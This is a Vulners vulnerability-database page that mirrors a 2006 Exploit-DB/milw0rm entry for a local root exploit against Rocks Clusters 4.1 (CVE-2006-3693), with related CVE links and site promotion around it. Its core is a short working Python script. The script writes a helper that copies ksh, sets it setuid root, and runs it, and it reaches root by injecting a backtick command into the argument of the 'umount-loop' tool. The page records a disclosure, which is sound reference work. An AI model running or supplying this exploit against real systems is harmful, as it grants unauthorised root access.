Lucene search
+L

Rocks Clusters 4.1 - 'umount-loop' Local Privilege Escalation

🗓️ 15 Jul 2006 00:00:00Reported by Xavier de LeonType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Rocks Clusters 4.1 local privilege escalation exploi

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-3693
19 Jul 200601:00
cve
cvelist
Cvelist
CVE-2006-3693
19 Jul 200601:00
cvelist
exploitdb
Exploit DB
Rocks Clusters 4.1 - 'mount-loop' Local Privilege Escalation
15 Jul 200600:00
exploitdb
euvd
EUVD
EUVD-2006-3688
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-3693
21 Jul 200614:03
nvd
#!/usr/bin/env python
##############################################################################
##  rocksumountdirty.py: Rocks release <=4.1 local root exploit
##  quick and nasty version of the exploit. make sure the . is writable and
##  you clean up afterwards. ;)
##
##  coded by: [email protected] [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by [email protected] [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)

# milw0rm.com [2006-07-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jul 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.6
EPSS0.00932
37